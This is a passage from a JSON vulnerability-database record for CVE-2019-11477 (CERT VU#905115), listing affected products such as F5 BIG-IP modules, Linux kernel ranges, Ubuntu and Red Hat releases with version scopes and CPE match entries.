        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "pulse policy secure",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "pulsesecure",
        "version": null
      },
      {
        "model": "pulse secure virtual application delivery controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "pulsesecure",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.10"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip domain name system",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "traffix signaling delivery controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "5.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "big-ip link controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.5"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "connect secure",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ivanti",
        "version": null
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip domain name system",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.69"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.127"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip application security manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "enterprise linux aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.1.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.182"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "14.0.0"
      },
      {
        "model": "big-ip policy enforcement manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip fraud protection service",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "big-ip global traffic manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "big-ip advanced firewall manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "f5",
        "version": "15.0.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "13.1.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.52"
      },
      {
        "model": "big-ip access policy manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.04"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "traffix signaling delivery controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "5.0.0"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "enterprise mrg",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "2.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip application security manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip application acceleration manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "enterprise linux aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.6"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "arch linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "arista",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "check point",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "coreos",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "debian gnu linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "suse linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "synology",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ubuntu",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11477"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.182",
                "versionStartIncluding": "4.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.127",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.52",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.1.11",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.16.69",
                "versionStartIncluding": "2.6.29",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.182",
                "versionStartIncluding": "3.17",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
